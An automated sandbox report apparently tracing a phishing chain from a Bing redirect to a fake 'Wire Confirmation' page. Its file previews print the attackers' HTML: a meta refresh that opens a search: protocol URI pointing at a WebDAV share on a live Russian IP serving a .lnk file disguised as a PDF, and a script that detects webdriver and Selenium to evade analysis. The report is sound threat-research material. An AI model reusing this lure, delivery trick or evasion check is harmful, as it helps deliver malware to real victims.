Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.bing.com/ck/a?!&&p=ec2690ecb5e8783cJmltdHM9MTcxMzA1MjgwMCZpZ3VpZD0zNmI1MjYyNC1hNGNjLTZiMzktMTE1Yi0zNjI3YTBjYzY1YmEmaW5zaWQ9NTIzMA&ptn=3&ver=2&hsh=3&fclid=36b52624-a4cc-6b39-115b-3627a0cc65ba&psq=site%3atragiangoc.com&u=a1aHR0cDovL3RyYWdpYW5nb2MuY29tL3Zhbi1jaHV5ZW4tZ2lhby1uaGFuLw

Overview

General Information

Sample URL:https://www.bing.com/ck/a?!&&p=ec2690ecb5e8783cJmltdHM9MTcxMzA1MjgwMCZpZ3VpZD0zNmI1MjYyNC1hNGNjLTZiMzktMTE1Yi0zNjI3YTBjYzY1YmEmaW5zaWQ9NTIzMA&ptn=3&ver=2&hsh=3&fclid=36b52624-a4cc-6b39-115b-3627a0cc65
Analysis ID:1426794
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Chrome launches external ms-search protocol handler (WebDAV)
Phishing site or detected (based on various text indicators)

Classification

Process Tree

  • System is w10x64
  • chrome.exe (PID: 1068 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 1508 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1996,i,915152715888252964,5619724167490245158,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6408 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.bing.com/ck/a?!&&p=ec2690ecb5e8783cJmltdHM9MTcxMzA1MjgwMCZpZ3VpZD0zNmI1MjYyNC1hNGNjLTZiMzktMTE1Yi0zNjI3YTBjYzY1YmEmaW5zaWQ9NTIzMA&ptn=3&ver=2&hsh=3&fclid=36b52624-a4cc-6b39-115b-3627a0cc65ba&psq=site%3atragiangoc.com&u=a1aHR0cDovL3RyYWdpYW5nb2MuY29tL3Zhbi1jaHV5ZW4tZ2lhby1uaGFuLw" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Phishing site or detected (based on various text indicators)
Source: Chrome DOM: 0.0OCR Text: Wire Confirmation Receipt for your review Access document now . Received April 2024 . Reference NO ...F04122, Wire Confirmation / TN ...RP2784 . 1 Page. ACCESS HERE TO REVIEW FULL DOCUMENT NOW Cordialement, With kind regards, John Keshia Account Manager0486/09.55.81
Source: https://pub-6d8650014e23489d8c6e14ca9312426a.r2.dev/WireConfirmation_2004.10.2024.htmlHTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.107.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.107.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.107.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.107.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.107.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.107.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.107.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.107.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.107.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.107.240
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.107.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.107.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.107.240
Source: global trafficHTTP traffic detected: GET /van-chuyen-giao-nhan/ HTTP/1.1Host: tragiangoc.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /WireConfirmation_2004.10.2024.html HTTP/1.1Host: pub-6d8650014e23489d8c6e14ca9312426a.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://tragiangoc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: pub-6d8650014e23489d8c6e14ca9312426a.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-6d8650014e23489d8c6e14ca9312426a.r2.dev/WireConfirmation_2004.10.2024.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=oDpGcPGGdcbSnd9&MD=hxMSsSOB HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=oDpGcPGGdcbSnd9&MD=hxMSsSOB HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /Wire%20Confirmation/WireConfirmation.pdf.lnk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045translate: fHost: 89.23.107.240
Source: unknownDNS traffic detected: queries for: tragiangoc.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 14:25:26 GMTContent-Type: text/htmlContent-Length: 27242Connection: closeServer: cloudflareCF-RAY: 8754d83cb88f6755-ATL
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 14:26:18 GMTContent-Length: 9Content-Type: text/plain; charset=utf-8Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 14:26:19 GMTContent-Length: 9Content-Type: text/plain; charset=utf-8Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 14:26:21 GMTContent-Length: 9Content-Type: text/plain; charset=utf-8Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: chromecache_48.2.drString found in binary or memory: https://developers.cloudflare.com/r2/data-access/public-buckets/
Source: chromecache_46.2.drString found in binary or memory: https://www.base64encode.org/
Source: chromecache_48.2.drString found in binary or memory: https://www.cloudflare.com/favicon.ico
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: classification engineClassification label: mal48.phis.evad.win@20/6@8/6
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1996,i,915152715888252964,5619724167490245158,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.bing.com/ck/a?!&&p=ec2690ecb5e8783cJmltdHM9MTcxMzA1MjgwMCZpZ3VpZD0zNmI1MjYyNC1hNGNjLTZiMzktMTE1Yi0zNjI3YTBjYzY1YmEmaW5zaWQ9NTIzMA&ptn=3&ver=2&hsh=3&fclid=36b52624-a4cc-6b39-115b-3627a0cc65ba&psq=site%3atragiangoc.com&u=a1aHR0cDovL3RyYWdpYW5nb2MuY29tL3Zhbi1jaHV5ZW4tZ2lhby1uaGFuLw"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1996,i,915152715888252964,5619724167490245158,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected

Persistence and Installation Behavior

barindex
Chrome launches external ms-search protocol handler (WebDAV)
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile opened: \Device\RdpDr\;:1\89.23.107.240@80\Wire ConfirmationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection		1
Process Injection		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer		Traffic DuplicationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
https://www.bing.com/ck/a?!&&p=ec2690ecb5e8783cJmltdHM9MTcxMzA1MjgwMCZpZ3VpZD0zNmI1MjYyNC1hNGNjLTZiMzktMTE1Yi0zNjI3YTBjYzY1YmEmaW5zaWQ9NTIzMA&ptn=3&ver=2&hsh=3&fclid=36b52624-a4cc-6b39-115b-3627a0cc65ba&psq=site%3atragiangoc.com&u=a1aHR0cDovL3RyYWdpYW5nb2MuY29tL3Zhbi1jaHV5ZW4tZ2lhby1uaGFuLw0%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
tragiangoc.com
104.21.39.145
truefalse
    		unknown
    www.google.com
    		64.233.185.147
    		truefalse
      		high
      pub-6d8650014e23489d8c6e14ca9312426a.r2.dev
      		104.18.3.35
      		truefalse
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://pub-6d8650014e23489d8c6e14ca9312426a.r2.dev/favicon.icofalse
          		unknown
          http://89.23.107.240/Wire%20Confirmation/WireConfirmation.pdf.lnktrue
            		unknown
            https://tragiangoc.com/van-chuyen-giao-nhan/false
              		unknown
              https://pub-6d8650014e23489d8c6e14ca9312426a.r2.dev/WireConfirmation_2004.10.2024.htmlfalse
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://www.base64encode.org/chromecache_46.2.drfalse
                  		high
                  https://www.cloudflare.com/favicon.icochromecache_48.2.drfalse
                    		high
                    https://developers.cloudflare.com/r2/data-access/public-buckets/chromecache_48.2.drfalse
                      		high

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      104.18.3.35
                      		pub-6d8650014e23489d8c6e14ca9312426a.r2.devUnited States
                      		13335CLOUDFLARENETUSfalse
                      239.255.255.250
                      		unknownReserved
                      		unknownunknownfalse
                      89.23.107.240
                      		unknownRussian Federation
                      		48687MAXITEL-ASRUtrue
                      104.21.39.145
                      		tragiangoc.comUnited States
                      		13335CLOUDFLARENETUSfalse
                      64.233.185.147
                      		www.google.comUnited States
                      		15169GOOGLEUSfalse

                      Private

                      IP
                      192.168.2.4

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1426794
                      Start date and time:2024-04-16 16:24:33 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 2m 59s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:browseurl.jbs
                      Sample URL:https://www.bing.com/ck/a?!&&p=ec2690ecb5e8783cJmltdHM9MTcxMzA1MjgwMCZpZ3VpZD0zNmI1MjYyNC1hNGNjLTZiMzktMTE1Yi0zNjI3YTBjYzY1YmEmaW5zaWQ9NTIzMA&ptn=3&ver=2&hsh=3&fclid=36b52624-a4cc-6b39-115b-3627a0cc65ba&psq=site%3atragiangoc.com&u=a1aHR0cDovL3RyYWdpYW5nb2MuY29tL3Zhbi1jaHV5ZW4tZ2lhby1uaGFuLw
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:13
                      Number of new started drivers analysed:1
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal48.phis.evad.win@20/6@8/6
                      EGA Information:Failed
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Browse: search:query=WireConfirmation.pdf&crumb=location:\\89.23.107.240@80\Wire Confirmation\&displayname=Wire Confirmation

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, mrxdav.sys, dllhost.exe, rundll32.exe, SIHClient.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 64.233.185.138, 64.233.185.102, 64.233.185.101, 64.233.185.100, 64.233.185.113, 64.233.185.139, 173.194.219.84, 142.250.9.94, 34.104.35.123, 13.107.21.200, 204.79.197.200, 199.232.210.172, 192.229.211.108, 108.177.122.94
                      • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, dual-a-0001.a-msedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, www-bing-com.dual-a-0001.a-msedge.net, update.googleapis.com, wwwprod.www-bing-com.akadns.net, clients.l.google.com
                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtSetInformationFile calls found.

                      Simulations

                      Behavior and APIs

                      No simulations

                      Joe Sandbox View / Context

                      IPs

                      No context

                      Domains

                      No context

                      ASNs

                      No context

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      Chrome Cache Entry: 46

                      Download File
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:HTML document, ASCII text, with very long lines (1071), with CRLF line terminators
                      Category:downloaded
                      Size (bytes):9417
                      Entropy (8bit):4.8408413919539495
                      Encrypted:false
                      SSDEEP:96:7r6CLPcRff+3uxBGvLeZvXfr4d1mM+ujrYaCnRbr/oePRW+T:yQPcRff+3uxBGvLSXj4d1X+ujrYaYHZ
                      MD5:D0B69729A3F8176707D12870EEF4534D
                      SHA1:967159D74588CFD28DC7E66F4644947E9B1C4AB7
                      SHA-256:CE4BE3829C5941215EA10C047E8AD2465A70C97135DA5C694831AAA61235AD8B
                      SHA-512:54647742434DD36F8AD95731253CFEC1DC73C51D63ADD21D682FDBF583426BCB1BD31235FF7427860EA5810E971912DBCA505939848A687BC6F8B9542ACC0F71
                      Malicious:false
                      Reputation:low
                      URL:https://tragiangoc.com/van-chuyen-giao-nhan/
                      Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta name="robots" content="noimageindex, nofollow, nosnippet, noindex, noarchive, nocache, notranslate, noyaca">.. <meta http-equiv="Content-Type" content="text/html; charset=us-ascii">.. <title></title>.. <meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, user-scalable=yes">.. <script>.. function runBotDetection() {.. let documentDetectionKeys = ["webdriver", "_WEBDRIVER_ELEM_CACHE", "ChromeDriverw", "Geckowebdriver", "driver-evaluate", "webdriver-evaluate", "selenium-evaluate", "selenium-webdriver", "webdriverCommand", "webdriver-evaluate-response", "__webdriverFunc", "__$webdriverAsyncExecutor", "$wdc_asdjflasutopfhvcZLmcfl_", "__lastWatirAlert", "__lastWatirConfirm", "__lastWatirPrompt", "$chrome_asyncScriptInfo", "$cdc_asdjflasutopfhvcZLmcfl_", "__webdriver_evaluate", "__selenium_evaluate", "__webdriver_script_function", "__webdriver_script_func

                      Chrome Cache Entry: 47

                      Download File
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:HTML document, ASCII text, with CRLF line terminators
                      Category:downloaded
                      Size (bytes):1435
                      Entropy (8bit):5.226781948576606
                      Encrypted:false
                      SSDEEP:24:hPRCrMxikpW5KHxM2YaoCS3DZPlP1S3wdhq7AkyFSY14X0:tzxikoMHL3vSzZPlP4wHh/Smw0
                      MD5:47114EABB690F96FD59EE4C17DDDCDE0
                      SHA1:631C086794BBF9A0D07B36DF31620B055A899C25
                      SHA-256:DBD779E8D4194BDA240BC6FC3F920DC95CF26EDCF193EABEE88791B2E7C0E8C9
                      SHA-512:0004D7E47382AB33F7084F112D5D73FDF25315579435F61223308EC7DB7FFC6B854627F559EA62C3AE0D93EB8B5D1900A1A1BF3F9AF046750218E2BDCDF3D1C9
                      Malicious:false
                      Reputation:low
                      URL:https://pub-6d8650014e23489d8c6e14ca9312426a.r2.dev/WireConfirmation_2004.10.2024.html
                      Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta http-equiv="refresh" content="0; URL=search:query=WireConfirmation.pdf&amp;crumb=location:\\89.23.107.240@80\Wire Confirmation\&amp;displayname=Wire Confirmation">.. <title>Document</title>..</head>..<body style="text-align: center; font-size: 32px; font-weight: bold; line-height: 40px; font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;">.. <p style="color: #737373;">.. Wire Confirmation Receipt for your review.. </p> .. <p style="color: #3B5BDB;">.. Access document now<br/>.. . Received April 2024<br/>.. . Reference NO ...F04122, Wire Confirmation / TN ...RP2784<br/>.. . 1 Page.<br/>.. </p>.. <p>.. <a .. target="_blank".. style="color: #68AE34;"..

                      Chrome Cache Entry: 48

                      Download File
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:HTML document, ASCII text, with very long lines (611)
                      Category:downloaded
                      Size (bytes):27242
                      Entropy (8bit):4.3631679730758375
                      Encrypted:false
                      SSDEEP:384:6FamwIluB0sJQqCeSQup5szCUXAG0VVi82OgoKACZQQofNJXY3gW3:663Mp5If8WOmgW3
                      MD5:DF3D48946E8D3F5A83608308EDBB4B86
                      SHA1:47B9C40C97ABF2658DF96B1C06109324E15E1A00
                      SHA-256:570A6631252B8A52DF4DE0E953AE77DBDF524DFC3637CDA2840494A0D2B49499
                      SHA-512:36EC1CEC72DC3245730C813277C645525473CC5232E85CD23503B8593D90264F335E61A16D364A1E6C41922820B40BA7C0F46B19F4B91DB6A0CF5E31E778DDEA
                      Malicious:false
                      Reputation:low
                      URL:https://pub-6d8650014e23489d8c6e14ca9312426a.r2.dev/favicon.ico
